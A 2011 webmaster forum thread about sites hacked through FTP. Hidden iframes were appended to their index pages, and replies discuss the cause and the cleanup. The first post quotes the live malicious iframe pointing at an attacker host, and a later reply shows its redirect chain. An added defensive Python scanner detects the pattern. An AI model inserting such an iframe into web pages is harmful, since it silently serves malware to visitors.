Server hacked - I am infected

By accident I opened an infected file


jetteroheller

3:36 pm on Jan 22, 2011 (gmt 0)

WebmasterWorld Senior Member 10+ Year Member Top Contributors Of The Month



Today, all my accounts have been hacked.

All index.htm files had been downloaded,

ATTENTION - here follows the malware code

<iframe src="http://80.91.191.158/stats/priemIframe.php?part=2&hashftp=94084c73145a76e12ac6c2169dc3cb17&hashpage=07ff9fc87b87022c88d55c5fb050314a" width=10 border=1 height=10 style="visibility:hidden"></iframe>

and uploaded again with this at the end.

By accident, I visited a page with this code.

My notebook has Windows 7 and MSIE 8 with latest updates.

Can my notebook be infected by this code?

jimbeetle

5:42 pm on Jan 22, 2011 (gmt 0)

WebmasterWorld Senior Member 10+ Year Member Top Contributors Of The Month



Yeah, a lot of sites get hacked because a keylogger was downloaded to the local machine first. Get your host to scrub your sites while you're disinfecting your notebook.

Key_Master

5:50 pm on Jan 22, 2011 (gmt 0)

WebmasterWorld Senior Member 10+ Year Member



I sent a bot in to follow the link in the iframe and didn't find any malicious code at the other end. This doesn't mean you haven't been infected, and the sites are definitely suspicious. I would recommend that you be proactive and take steps to clean your laptop and change all passwords, just to be on the safe side.

>Scanned: http:/80.91.191.158/stats/priemIframe.php?part=2&hashftp=94084c73145a76e12ac6c2169dc3cb17&hashpage=07ff9fc87b87022c88d55c5fb050314a
>Base URL: http:/finnerdy.com/tw61xx3lmks.php?s=IBCFA
>Redirected 1 times.

HTTP/1.1 302 Found
Connection: close
Date: Sat, 22 Jan 2011 17:41:33 GMT
Location: http:/finnerdy.com/tw61xx3lmks.php?s=IBCFA
Server: Apache/2.2.3 (CentOS)
Content-Length: 0
Content-Type: text/html; charset=UTF-8
Client-Date: Sat, 22 Jan 2011 17:40:23 GMT
Client-Peer: 80.91.191.158:80
Client-Response-Num: 1
X-Powered-By: PHP/5.2.16

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Sat, 22 Jan 2011 17:40:23 GMT
Pragma: no-cache
Server: nginx/0.6.32
Content-Type: text/html; charset=Windows-1251
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Client-Date: Sat, 22 Jan 2011 17:40:23 GMT
Client-Peer: 98.142.241.170:80
Client-Response-Num: 1
Client-Transfer-Encoding: chunked
Set-Cookie: PHPSESSID=ad22e868d5c565b15efce87400a69994; path=/
X-Powered-By: PHP/5.2.6-1+lenny9

jetteroheller

5:54 pm on Jan 22, 2011 (gmt 0)

WebmasterWorld Senior Member 10+ Year Member Top Contributors Of The Month



> Yeah, a lot of sites get hacked because a keylogger was downloaded to the local machine first. Get your host to scrub your sites while you're disinfecting your notebook.


It's the 3rd case.

In no case was anything found on the local computer.

Also I never type my passwords. They are all used by my software.

rocknbil

7:17 pm on Jan 25, 2011 (gmt 0)

WebmasterWorld Senior Member 10+ Year Member



Are you running Wordpress?
A link of interest [webmasterworld.com], be sure to see the "sighting" links I posted in that thread too. It's not *always* a virus or keylogger.

Seen this one before too.

jetteroheller

7:51 pm on Jan 25, 2011 (gmt 0)

WebmasterWorld Senior Member 10+ Year Member Top Contributors Of The Month



I have my own CMS system.

My system with compressed delivery decreased the effect:

Without compressed delivery:

Many visitors get an infection
Google shows a warning for malware site

With compressed delivery, all html files are gunzip compressed.
Visitors see only an error message "Trailing garbage at decompression"
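Added example, not code from any poster in this thread: a Python check for the injection pattern described in the first post (a hidden iframe appended to index.htm), extended to the compressed-delivery case from this post, where the appended text ends up after the gzip stream and is exactly the "trailing garbage" that visitors' browsers complain about. The iframe host in the constructed sample is a placeholder (192.0.2.1, TEST-NET), not the address quoted in the thread.

```python
import gzip
import re
import zlib

# Constructed sample of the appended hidden-iframe pattern. The host is a
# placeholder (192.0.2.1, TEST-NET), not the address quoted in the thread.
INJECTED = (b'<iframe src="http://192.0.2.1/stats/priemIframe.php?part=2" '
            b'width=10 border=1 height=10 style="visibility:hidden"></iframe>')
CLEAN_HTML = b"<html><body><h1>Hello</h1></body></html>\n"

HIDDEN_IFRAME = re.compile(
    r'<iframe\b[^>]*\bstyle\s*=\s*["\']?[^"\'>]*visibility\s*:\s*hidden[^>]*>',
    re.IGNORECASE)
SRC_ATTR = re.compile(r'\bsrc\s*=\s*["\']?([^"\'\s>]+)', re.IGNORECASE)


def find_hidden_iframes(html: bytes) -> list:
    """Return the src of every iframe hidden with visibility:hidden."""
    text = html.decode("latin-1")  # byte-transparent; never raises
    hits = []
    for tag in HIDDEN_IFRAME.finditer(text):
        src = SRC_ATTR.search(tag.group(0))
        hits.append(src.group(1) if src else "(no src)")
    return hits


def gzip_trailing_garbage(data: bytes) -> bytes:
    """Return whatever follows the last gzip member: text appended to an
    already-compressed file lands here (the 'trailing garbage' error)."""
    rest = data
    while rest.startswith(b"\x1f\x8b"):
        d = zlib.decompressobj(16 + zlib.MAX_WBITS)  # one gzip member
        d.decompress(rest)
        if not d.eof:
            raise ValueError("truncated gzip member")
        rest = d.unused_data
    return rest


def scan_file(data: bytes) -> dict:
    """Report hidden iframes in a plain or gzip-compressed page body."""
    if not data.startswith(b"\x1f\x8b"):
        return {"gzip": False, "trailing_bytes": 0,
                "hidden_iframes": find_hidden_iframes(data)}
    trailing = gzip_trailing_garbage(data)
    body = gzip.decompress(data[:len(data) - len(trailing)])
    return {"gzip": True, "trailing_bytes": len(trailing),
            "hidden_iframes": find_hidden_iframes(body)
            + find_hidden_iframes(trailing)}
```

Run `scan_file()` over each served index.htm; a non-zero `trailing_bytes` on a gzip-delivered file or any entry in `hidden_iframes` means the file was appended to after it was published.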

int13

9:04 pm on Jan 25, 2011 (gmt 0)

10+ Year Member



Hi there,

you are not the only one. Many servers are hacked like this every day. On my blog I analyzed the malware.

You may have used Filezilla to transfer your files. So mostly all of your hosts may be compromised.

[integer13.wordpress.com...]


Hope this helps,

Andre